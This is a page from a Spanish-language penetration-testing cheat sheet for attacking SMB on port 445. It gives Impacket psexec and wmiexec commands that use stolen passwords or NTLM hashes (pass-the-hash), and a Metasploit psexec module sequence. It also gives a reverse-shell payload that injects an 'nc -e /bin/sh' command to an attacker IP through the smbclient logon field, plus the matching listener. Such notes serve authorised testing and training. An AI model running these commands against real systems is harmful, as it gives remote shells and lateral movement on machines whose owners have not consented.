445/TCP (SMB)

SMB, Server Message Block.

Impacket

# impacket-psexec
psexec.py <user>:"<password>"@<target>
psexec.py <ACME.LOCAL>/<user>:"<password>"@<target>
psexec.py <ACME.LOCAL>/<user>@<target> -hashes <hash>

# impacket-wmiexec
wmiexec.py <user>:"<password>"@<target>
wmiexec.py <ACME.LOCAL>/<user>:"<password>"@<target>
wmiexec.py <ACME.LOCAL>/<user>@<target> -hashes <hash>

<user> = usuario.
<password> = contraseña.
<target> = dirección IP del objetivo.
<hash> = LMHASH:NTHASH

Metasploit

use exploit/windows/smb/psexec
set RHOSTS <target>
set SMBUser <username>
set SMBPass <password>
run

Reverse shell

smbclient //<target>/tmp
logon "./=`nohup nc -e /bin/sh <attacker-IP-address> <listen-port>`"
nc -lvnp <listen-port>

Anterior80/TCP, 443/TCP (HTTP/S)Siguiente161/UDP, 162/UDP (SNMP)

Última actualización hace 1 año